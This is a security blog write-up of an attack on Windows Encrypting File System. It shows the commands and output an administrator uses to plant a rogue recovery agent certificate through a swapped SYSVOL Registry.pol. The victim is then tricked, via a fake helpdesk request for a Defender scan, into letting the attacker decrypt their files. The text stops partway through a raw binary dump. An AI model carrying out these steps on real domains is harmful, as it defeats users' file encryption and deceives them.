Injecting an EFS Recovery Agent – and Let the Virus Scanner Help You!

How can you read files encrypted with Windows’s Encrypting File System if you neither have access to the owner’s encryption certificate and key and nor that of a legit data recovery agent (DRA) … but if you are a local administrator?

This work is still inspired by the hackthebox machine Helpline. You were able to get even SYSTEM access on this box rather easily – but you could neither read files (flags) of the unprivileged user nor the Administrator as their files had each been encrypted with their personal private keys, belonging to EFS certificates (Encrypting File System). The intended way would have been to follow other hints and eventually obtain those user and admin accounts’ passwords.

I still wanted to attack EFS directly, and came up with an unintended – but a bit silly – solution. ‘Silly’ as the attack requires the accidental co-operation from the victim: As SYSTEM or any user with Administrator’s privileges, you can inject an evil recovery agent’s certificate into the registry, and you can import this evil agent’s certificate and key.  But this recovery certificate is not automatically used to re-encrypt file encryption keys: Only after the victim user has looked at their files, EFS information is updated and the attacker can also view the files.

It might be difficult to social engineer a user to explicitly open secret files. But perhaps the victim can be persuaded to do a custom scan of his data with Microsoft’s built-in virus scanner Defender?

This article comprises an outline of the attack. Compared to my 2019 Helpline writeup I tested it now on a Domain Controller, thus I needed a new way of injecting. I also focus on the attack itself – while the old writeup showed all the details how to get the shell, how I automated it etc.

Summary

  • Starting point: The attacker manages to obtain administrative permissions and run an elevated shell on a Windows server in a domain. Let’s assume the attacker cannot crack the hashes of the super strong passwords in Active Directory.
  • So they can neither decrypt the victim’s EFS files directly, nor can they logon on behalf of the users.
  • The evil admin prepares an EFS recovery agent certificate using the Windows built-in tool cipher, and imports key and certificate to their personal store in the shell they obtained (using certutil).
  • For a standalone server, you would have prepared the registry files containing the information about currently used agents (EFS blobs and certificates), transfer it to the victim server and import it into the registry as described in the Helpline article. However, that approach did not work for the Domain Controller.
  • This for the DC, I went for directly replacing the registry.pol file in the SYSVOL folder instead.
  • The evil admin updates the computer Group Policy in their shell.
  • Now they wait for the user to access their secret files – or they social engineer them to do this! One way to make this more realistic is perhaps to ask the user to do a custom Defender scan as a ‘Helpdesk Engineer’. (Evil admin cannot virus scan the encrypted files in their shell).
  • Then the encrypted files could can be read by the evil admin! Running cipher, this admin can also confirm that their evil agent has indeed been used to encrypt the file encryption key.

BTW it was innocuous information by Microsoft about virus scanning EFS files that inspired me:

Your virus check program can only read files that have been encrypted by you. If other users have encrypted files on your hard disk, access to these files is denied to the virus check program. To perform a virus check for files that have been encrypted by other users, the other users must log on and run the virus check program.

Contents

Victim user encrypts files
Evil Admin creates Data Recovery Agent certificate and key
Evil Admin imports DRA certificate and key
Evil Admin cannot yet read user’s files
Locates registry.pol file for the Default Domain policy
Prepares a replacement Registry.pol file
Evil Admin swaps registry.pol file
Evil Admin updates GPO
User does a custom virus scan
Evil Admin reads the victim’s files
Update: Fully automate the attack

Details

I try to keep it concise and stick to the commands only. For more details on EFS background etc. see my 2019 write-up. (which also contains possibly distracting details using a particularly painful shell ‘for fun’ and automating it).

Victim user encrypts files

A user would use Windows Explorer to encrypt files, but theoretically they could use also cipher to 1) encrypt the file and then 2) check the EFS related meta-information. In this case the legit recovery agent certificate has a thumbprint CB3E C24A 5334 DF99 6D76 B770 F963 82C7 048E 3CB7. If EFS has never explicitly configured in a domain, this certificate (with a validity period of 3 years) and key has been created when the Domain Administrator has logged on to the first DC ever installed on Windows 2000, and added to the EFS section of the Default Domain Policy (which actually was often an issue in the year of 2003, when those default agents’ certificates and keys had expired).

User encrypts a file:

C:\Users\efsfreak\Desktop\EFS Files>cipher /E efs.txt

 Encrypting files in C:\Users\efsfreak\Desktop\EFS Files\

efs.txt             [OK]

1 file(s) [or directorie(s)] within 1 directorie(s) were encrypted.

Converting files from plaintext to ciphertext may leave sections of old
plaintext on the disk volume(s). It is recommended to use command
CIPHER /W:directory to clean up the disk after all converting is done.

User checks file:

C:\Users\efsfreak\Desktop\EFS Files>cipher /C efs.txt

 Listing C:\Users\efsfreak\Desktop\EFS Files\
 New files added to this directory will not be encrypted.

E efs.txt
  Compatibility Level:
    Windows XP/Server 2003

  Users who can decrypt:
    SECRET\efsfreak [efsfreak(efsfreak@secret.key)]
    Certificate thumbprint: 23CD E0CD DD5D 9D9A 9637 2A95 75F2 F78B C38A 5199

  Recovery Certificates:
    Administrator(Administrator@SECRET)
    Certificate thumbprint: CB3E C24A 5334 DF99 6D76 B770 F963 82C7 048E 3CB7

  Key Information:
    Algorithm: AES
    Key Length: 256
    Key Entropy: 256

Evil Admin creates Data Recovery Agent certificate and key

This can be done on the attacked machine or ‘offline’ in a lab (and then transferred / downloaded to the attacked server). The name in the certificate does not matter. Using cipher, the subject name is made equal to the name of the logged-on user. For an extra stealth factor you could thus run it as an Administrator of a test domain with the same name as the attacked domain.

I stick with eviladmin though:

C:\Evil Folder>cipher /R:eviladmin
Please type in the password to protect your .PFX file:
Please retype the password to confirm:


Your .CER file was created successfully.
Your .PFX file was created successfully.

C:\Evil Folder>dir evil*
 Volume in drive C has no label.
 Volume Serial Number is 2630-6B52

 Directory of C:\Evil Folder

15.04.2021  16:29               891 eviladmin.CER
15.04.2021  16:29             2 686 eviladmin.PFX
               2 File(s)          3 577 bytes
               0 Dir(s)  35 887 087 616 bytes free

Contents of this certificate, take note of the hash – Cert Hash(sha1): 2aac254220af39d46ed768a7cc185cff404000fd:

C:\Evil Folder>certutil eviladmin.cer
X509 Certificate:
Version: 3
Serial Number: 444b3bbc0aaf6bac421d99a9b70ddac4
Signature Algorithm:
    Algorithm ObjectId: 1.2.840.113549.1.1.5 sha1RSA
    Algorithm Parameters:
    05 00
Issuer:
    OU=EFS File Encryption Certificate
    L=EFS
    CN=eviladmin
  Name Hash(sha1): d6636940263a615c8a21f797d5720bf15e0a6fff
  Name Hash(md5): 56427d4b8b70d62a4c95f231abf21423

 NotBefore: 15.04.2021 16:29
 NotAfter: 22.03.2121 16:29

Subject:
    OU=EFS File Encryption Certificate
    L=EFS
    CN=eviladmin
  Name Hash(sha1): d6636940263a615c8a21f797d5720bf15e0a6fff
  Name Hash(md5): 56427d4b8b70d62a4c95f231abf21423

Public Key Algorithm:
    Algorithm ObjectId: 1.2.840.113549.1.1.1 RSA (RSA_SIGN)
    Algorithm Parameters:
    05 00
Public Key Length: 2048 bits
Public Key: UnusedBits = 0
    0000  30 82 01 0a 02 82 01 01  00 c2 8b 89 20 f1 1d 57
    0010  c8 bc 19 5e a3 b5 96 80  74 00 5f 42 f9 cd 90 99
    0020  c7 cc 51 d4 f0 dd 10 04  f1 da f3 31 66 87 5a 1e
    0030  50 f0 eb 75 9d 98 27 f1  09 60 32 74 6d fa b1 3a
    0040  3f a5 9d 48 8e 69 68 28  48 07 6a 9e 44 f6 b6 14
    0050  58 b9 41 d4 70 ff a2 3b  94 a8 1c 5b ab 8d 77 26
    0060  96 85 e1 b1 af 59 f9 f6  79 cc 88 61 67 96 39 e1
    0070  0d 6c 55 97 a0 90 be 25  dd 01 16 f0 9e 08 4c ea
    0080  7c e6 4b 31 8b 7c ff 84  3a a3 a9 44 66 68 44 08
    0090  49 15 90 21 9b 19 e8 ba  99 9f 56 24 f2 6f 2e 86
    00a0  97 e6 10 30 7b 7c 83 b2  6b 54 c4 bb eb 92 ab 10
    00b0  a1 f5 4d 17 b1 db d0 cb  46 70 42 ff 82 a4 35 07
    00c0  17 c1 74 bf de af 8a da  0c 34 98 9c 91 7e fe 0c
    00d0  42 6a d9 6c 9f 5f 96 3a  dd 5e e6 1d c3 34 b2 0a
    00e0  ea bc 2e 38 11 69 4e 47  64 46 c5 2e ec dd 2f 3e
    00f0  21 27 60 51 c1 51 36 30  75 f7 2e 28 8a b7 93 03
    0100  93 97 4c c3 f4 9c 8e 53  31 02 03 01 00 01
Certificate Extensions: 3
    2.5.29.37: Flags = 0, Length = f
    Enhanced Key Usage
        File Recovery (1.3.6.1.4.1.311.10.3.4.1)

    2.5.29.17: Flags = 0, Length = 25
    Subject Alternative Name
        Other Name:
             Principal Name=eviladmin@SECRET

    2.5.29.19: Flags = 0, Length = 2
    Basic Constraints
        Subject Type=End Entity
        Path Length Constraint=None

Signature Algorithm:
    Algorithm ObjectId: 1.2.840.113549.1.1.5 sha1RSA
    Algorithm Parameters:
    05 00
Signature: UnusedBits=0
    0000  b8 f4 22 88 37 81 c9 d2  21 e3 3a 76 f2 ef 1e c6
    0010  b3 8f 3f a2 42 bf 3c 2a  b5 b8 f3 92 a7 3c 79 8f
    0020  bf 29 1c 69 46 43 46 ca  eb b5 0a ac 66 0c f5 81
    0030  69 a4 4d 1e c0 ce ae a6  25 36 62 77 f8 cc 9e f6
    0040  9d 50 a1 7d da bd 9d db  1a 70 8b d3 19 78 bb 06
    0050  71 35 9d 29 1b 19 dc 54  f5 13 2a c7 d4 ec 7b 61
    0060  0f 7a b7 71 84 46 6e ad  70 53 aa e3 7d 7f 97 cb
    0070  a2 31 c4 36 ad e8 c9 c1  d9 d6 51 0a 3d 7e 7a d3
    0080  a5 98 c7 d5 68 f1 1c d5  7e ff 2a c3 c1 04 63 22
    0090  1c 75 01 e4 2f 60 b2 63  74 6f 69 ee 6e 7f fc 1d
    00a0  3f df fa 4f 5f f0 14 53  3d df 87 85 8a c0 b5 20
    00b0  8a ed 62 5b 92 fa 64 42  a1 46 f8 0c 6e 1b 34 e3
    00c0  2f 8a 60 d8 f2 5b 94 b7  0f 6e d4 35 83 1d 48 a7
    00d0  8e d6 04 86 21 02 41 00  bf 93 63 b1 28 a8 ba 71
    00e0  e3 00 fe 34 eb 2a f2 6d  70 af 04 44 04 3d 19 72
    00f0  b4 46 ee d6 10 ef a7 a2  a2 40 3c f1 67 fa 27 43
Signature matches Public Key
Root Certificate: Subject matches Issuer
Key Id Hash(rfc-sha1): 7c69d96f7b61a96e8848007b5b03bd1827d8063f
Key Id Hash(sha1): b490c6105740251e59f5526829a212ec7fa06689
Key Id Hash(bcrypt-sha1): 6fb581d20909d7e5bf9512fd456b2f56b1da2e60
Key Id Hash(bcrypt-sha256): c1e6832712477f797abf4550bebae50acf2a8020e23c975d7c3c3b533cf6309a
Key Id Hash(md5): c4545dabf25f1e0985f1457f58be96f7
Key Id Hash(sha256): 5cd862b2780db54fc3c49e14d1517f762a41a0456c27ea68eb5a9af035ecb39b
Key Id Hash(pin-sha256): /LcQSW1dHR8heddwHPApfZLuhRYCSvDxWFGH7iSo7lc=
Key Id Hash(pin-sha256-hex): fcb710496d5d1d1f2179d7701cf0297d92ee8516024af0f1585187ee24a8ee57
Cert Hash(md5): 7225a9ffbed005a52adf92570fcf36b5
Cert Hash(sha1): 2aac254220af39d46ed768a7cc185cff404000fd
Cert Hash(sha256): b788875a08c5e878470611ae0cd908bf08def4d07644018a01aba25f29d6c29f
Signature Hash: a61b0afde06bb4dc6933d98156c6b4b8cc5b02db
CertUtil: -dump command completed successfully.

Evil Admin imports DRA certificate and key

The PFX file created with cipher has to be available on the attacked server. The Evil Admins runs certutil to import it into their profile. The option NoRoot is needed to suppress the GUI popup that asks to confirm the “Root CA” hash of the self-signed certificate (seems to depend on the version of Windows if this is required or not, I haven’t needed it in 2019.).

certutil -q -importpfx -user -p Password1! "C:\Evil Folder\eviladmin.PFX" NoRoot
Certificate "eviladmin" added to store.

Evil Admin cannot yet read user’s files

Testing if Evil Admin can already read the file encrypted by the user:

type "C:\Users\efsfreak\Desktop\EFS Files\efs.txt"
Access is denied.

Locates registry.pol file for the Default Domain policy

… or the winning Group Policy Object (GPO) that determines EFS recovery settings. EFS policies including available data recovery agents’ certificates are stored in the registry at:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\EFS

Compared to the standalone server Helpline however, it did not work to overwrite this registry (plus subkeys) with keys that contained the evil agents. I also created the registry keys on the attacked server itself, using gpedit.msc to manipulate the Group Policy in an intended way: Importing the evil agent, updating the GPO, exporting the registry keys that obviously contained an additional certificate. When I reset the GPO to the default, and tried to inject the registry key instead if importing the agent, the policy never got used by the user – no matter in which order I updated the GPOs, or if I imported the registry to various other registry locations that represent GPO contents.

Maybe there is a way to hack this, but I tested something completely different – attack the source of the Group Object before it gets ‘downloaded’ to the registry, a file called Registry.pol located in the SYSVOL folder of the Domain Controller.

A quick way to find the right .pol file (and the right GPO) is by looking for readable strings hinting at that file. If EFS is used in this domain, the right GPO should have a DRA certificate in it.

In this simple next-next-finish test domain there is only one Registry.pol file in this folder in the SYSVOL directory:

C:\Windows\SYSVOL\domain\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE>dir
Volume in drive C has no label.
Volume Serial Number is 2630-6B52

Directory of C:\Windows\SYSVOL\domain\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE

15.04.2021 11:06 <DIR> .
15.04.2021 11:06 <DIR> ..
11.03.2021 16:44 <DIR> Microsoft
15.04.2021 11:06 7 498 Registry.pol
13.04.2021 14:32 <DIR> Scripts
1 File(s) 7 498 bytes
4 Dir(s) 35 897 745 408 bytes free

The content of the file contains also readable data in the certificate, showing that it had need issued to the Administrator of the domain SECRET.
In this example GPO I also activated AutoEnrollment – just to have some setting other than the EFS settings. Normally the legit GPO might contain lots of other settings.

C:\Windows\SYSVOL\domain\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE>type registry.pol
PReg   [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ C r y p t o g r a p h y \ A u t o E n r o l l m e n t   ; A E P o l i c y   ;    ;    ;    ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ C r y p t o g r a p h y \ A u t o E n r o l l m e n t   ; O f f l i n e E x p i r a t i o n P e r c e n t   ;    ;    ; 
   ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ C r y p t o g r a p h y \ A u t o E n r o l l m e n t   ; O f f l i n e E x p i r a t i o n S t o r e N a m e s   ;    ;    ; M Y   ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ A C R S \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ A C R S \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ A C R S \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ C A \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ C A \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ C A \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D i s a l l o w e d \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D i s a l l o w e d \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D i s a l l o w e d \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D P N G R A \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D P N G R A \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D P N G R A \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ E F S   ; E F S B l o b   ;    ; ¯  ;      §  £         ‡             0‚ƒ0‚k [æ5ñ‹ä–JV=Ì©½0
	*†H†÷
 0P10U
Administrator10
UEFS1(0&UEFS File Encryption Certificate0 
210311145116Z21210215145116Z0P10U
Administrator10
UEFS1(0&UEFS File Encryption Certificate0‚"0
	*†H†÷
 ‚ 0‚
‚ Çšfž¬qkê-Yï ™
« ÎïÞܐ6›­r_ÿ=fã¨ëÙ†šl¡gŒ[9™”ÝA\b³a’mš]–Ú‡Ëü›†5ÑhËJkÚÛ³²ÂÛ‰™¢”TƒN0h}¸Ò·µþ+=úøê+w0Ãù?¿€sÈȬÁ?Xðáp{ –0E›{çÛç´¦8&Ëì?Eö”É‹§Õ44fLÝœ¤páW›Y‚¸ÝãמŽmˆÓõæ¥Á9¼#Œ=™Ò°ÎN¤•—û-,í~…>Ñæ1d¯Ò¿eȯ\‡ì¥´Š/—IhUBz‰ë~î>•†úPÅS`¬ ¾yA £W0U0U%0
+‚7
00U)0' %
+‚7 Administrator@SECRET 0	U0 0
	*†H†÷
 ‚ 6·œcöâ¯ÜäÏèÁJ·
ÕçŠq×0•ž³clýʈL0‹2»Æb€½Où¦=y¹7ªX«‡‹ìè\¼sãË
¥T·*§E³ÐÍbyg\N‚ûv¯½xÁ“¶è¯ù	;RØ®]¸C±(Ìýß‘œ]	Iº$¶t‹ÿˆl)§mKùU‚=ót‘ˆèPq)[‘Æ´™ˆC‰Š©Uµ„Ò‹
¶×—7yŠOØD†ÂâÔôñ†#®†`î46+J·‚AšˆµJöOÇ«¤ƒµGўаq£ôlQþ{Ívœ[^Ž%œ™‚Ö/•!ñ‡d¹¡	Â$G §ö8] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ E F S \ C e r t i f i c a t e s \ C B 3 E C 2 4 A 5 3 3 4 D F 9 9 6 D 7 6 B 7 7 0 F 9 6 3 8 2 C 7 0 4 8 E 3 C B 7   ; B l o b   ;    ; ;  ; \                     ØÇiC§…àŸ¨PØÓ466„         0À#¹\"&GAn‹s‰ßÚ         Ë>ÂJS4ß™mv·pùc‚ÇŽ<·         fò
õezAܘÏa¹H°ŠÈûS         s&hh—ù‰ç²ZèÄS¦À•       ‡  0‚ƒ0‚k [æ5ñ‹ä–JV=Ì©½0
	*†H†÷
 0P10U
Administrator10
UEFS1(0&UEFS File Encryption Certificate0 
210311145116Z21210215145116Z0P10U
Administrator10
UEFS1(0&UEFS File Encryption Certificate0‚"0
	*†H†÷
 ‚ 0‚
‚ Çšfž¬qkê-Yï ™
« ÎïÞܐ6›­r_ÿ=fã¨ëÙ†šl¡gŒ[9™”ÝA\b³a’mš]–Ú‡Ëü›†5ÑhËJkÚÛ³²ÂÛ‰™¢”TƒN0h}¸Ò·µþ+=úøê+w0Ãù?¿€sÈȬÁ?Xðáp{ –0E›{çÛç´¦8&Ëì?Eö”É‹§Õ44fLÝœ¤páW›Y‚¸ÝãמŽmˆÓõæ¥Á9¼#Œ=™Ò°ÎN¤•—û-,í~…>Ñæ1d¯Ò¿eȯ\‡ì¥´Š/—IhUBz‰ë~î>•†úPÅS`¬ ¾yA £W0U0U%0
+‚7
00U)0' %
+‚7 Administrator@SECRET 0	U0 0
	*†H†÷
 ‚ 6·œcöâ¯ÜäÏèÁJ·
ÕçŠq×0•ž³clýʈL0‹2»Æb€½Où¦=y¹7ªX«‡‹ìè\¼sãË
¥T·*§E³ÐÍbyg\N‚ûv¯½xÁ“¶è¯ù	;RØ®]¸C±(Ìýß‘œ]	Iº$¶t‹ÿˆl)§mKùU‚=ót‘ˆèPq)[‘Æ´™ˆC‰Š©Uµ„Ò‹
¶×—7yŠOØD†ÂâÔôñ†#®†`î46+J·‚AšˆµJöOÇ«¤ƒµGўаq£ôlQþ{Ívœ[^Ž%œ™‚Ö/•!ñ‡d¹¡	Â$G §ö8] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ E F S \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ E F S \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E _ N K P \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E _ N K P \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E _ N K P \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ R o o t \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ R o o t \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ R o o t \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P e o p l e \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P e o p l e \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P e o p l e \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P u b l i s h e r \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P u b l i s h e r \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P u b l i s h e r \ C T L s   ;   ;     ;     ; ] 

There is also a free tool to view .pol files: https://sdmsoftware.com/389932-gpo-freeware-downloads/registry-pol-viewer-utility/ Using this tool, the template .pol files looks like this – Autoenrollment Policy shows a value of 7 (configured, both options checked), and the thumbprint of the DRA certificate in the EFS registry key is readable:

Prepares a replacement Registry.pol file

Here comes the cumbersome part of the attack, which might be automated by a tool to be developed – based on publicly available information on EFS blob data.

The attacker transfers Registry.pol to his evil lab, and prepares a replacement Registry.pol containing the eviladmin DRA certificate instead or in addition to the legit DRA (Administrator). In the latter case, the Administrator’s certificate would first have to be decoded and retrieved from the .pol file according to Microsoft’s specification. Also all the other settings in the legit GPO could be added in the test domain to make the evil pol file look nearly exactly as the legit one. Unfortunately, there is no tool to simply add settings to a GPO on the command line (AFAIK). The cipher tool has an interesting option /P, which allows to generate a BASE64 encoded EFS Blob from a certificate, which might be useful for automating the Registry.pol edit. The idea is to keep everything as it is, but replace the existing EFS data by the manipulated ones. No matter how you edit the .pol file, this will have an impact on other users (other than the target) that happen to update GPO and touch their EFS files.

In this PoC, I will simply add my evil agent as the only agent in a test domain, using GUI Group Policy Management tools. With those, every other legit setting can also be ‘copied’ in the sense of setting it explicitly.

The agent certificate has to be added to this branch of the winning computer group policy:

Computer Configuration, Policies, Windows Settings, Security Settings, Public Key Policies, Encrypting File System

The Registry.pol file in the SYSVOL folder is changed immediately, and ready to be used in the target environment. The evil .pol looks like this – the eviladmin DRA certificate hash can be checked against the SHA1 hash in the certutil dump above

PReg   [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ C r y p t o g r a p h y \ A u t o E n r o l l m e n t   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ A C R S \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ A C R S \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ A C R S \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ C A \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ C A \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ C A \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D i s a l l o w e d \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D i s a l l o w e d \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D i s a l l o w e d \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D P N G R A \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D P N G R A \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ D P N G R A \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ E F S   ; E F S B l o b   ;    ; £  ;      ›  —         {             0‚w0‚_ DK;¼
¯k¬B™©·
ÚÄ0
	*†H†÷
 0L10U	eviladmin10
UEFS1(0&UEFS File Encryption Certificate0 
210415142934Z21210322142934Z0L10U	eviladmin10
UEFS1(0&UEFS File Encryption Certificate0‚"0
	*†H†÷
 ‚ 0‚
‚ ‹‰ ñWȼ^£µ–€t _Bù͐™ÇÌQÔðÝñÚó1f‡ZPðëu˜'ñ	`2tmú±:?¥HŽih(HjžDö¶X¹AÔpÿ¢;”¨[«w&–…ᱯYùöÿag–9á
lU— ¾%ÝðžLê|æK1‹|ÿ„:£©DfhDI!›èº™ŸV$òo.†—æ0{|ƒ²kTĻ뒫¡õM±ÛÐËFpBÿ‚¤5Át¿Þ¯ŠÚ4˜œ‘~þBjÙlŸ_–:Ý^æÃ4²
ê¼.8iNGdFÅ.ìÝ/>!'`QÁQ60u÷.(Š·““—LÃôœŽS1 £S0Q0U%0
+‚7
0,U%0# !
+‚7 eviladmin@SECRET 0	U0 0
	*†H†÷
 ‚ C'úgñ<@¢¢§ïÖîF´r=D¯pmò*ë4þ ãqº¨(±c“¿ A!†ÖŽ§Hƒ5Ôn·”[òØ`Š/ã4nøF¡Bdú’[bíŠ µÀŠ…‡ß=Sð_Oúß?ünîiotc²`/äu"cÁÃ*ÿ~ÕñhÕǘ¥Óz~=
QÖÙÁÉè­6Ä1¢Ë—}ãªSp­nF„q·za{ìÔÇ*õTÜ)5q»xÓ‹p۝½Ú}¡PöžÌøwb6%¦®ÎÀM¤iõf¬
µëÊFCFi)¿y<§’ó¸µ*<¿B¢?³Æïòv:ã!ÒɁ7ˆ"ô¸] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ E F S \ C e r t i f i c a t e s \ 2 A A C 2 5 4 2 2 0 A F 3 9 D 4 6 E D 7 6 8 A 7 C C 1 8 5 C F F 4 0 4 0 0 0 F D   ; B l o b   ;    ; §  ;          *¬%B ¯9Ôn×h§Ì\ÿ@@ ý       {  0‚w0‚_ DK;¼
¯k¬B™©·
ÚÄ0
	*†H†÷
 0L10U	eviladmin10
UEFS1(0&UEFS File Encryption Certificate0 
210415142934Z21210322142934Z0L10U	eviladmin10
UEFS1(0&UEFS File Encryption Certificate0‚"0
	*†H†÷
 ‚ 0‚
‚ ‹‰ ñWȼ^£µ–€t _Bù͐™ÇÌQÔðÝñÚó1f‡ZPðëu˜'ñ	`2tmú±:?¥HŽih(HjžDö¶X¹AÔpÿ¢;”¨[«w&–…ᱯYùöÿag–9á
lU— ¾%ÝðžLê|æK1‹|ÿ„:£©DfhDI!›èº™ŸV$òo.†—æ0{|ƒ²kTĻ뒫¡õM±ÛÐËFpBÿ‚¤5Át¿Þ¯ŠÚ4˜œ‘~þBjÙlŸ_–:Ý^æÃ4²
ê¼.8iNGdFÅ.ìÝ/>!'`QÁQ60u÷.(Š·““—LÃôœŽS1 £S0Q0U%0
+‚7
0,U%0# !
+‚7 eviladmin@SECRET 0	U0 0
	*†H†÷
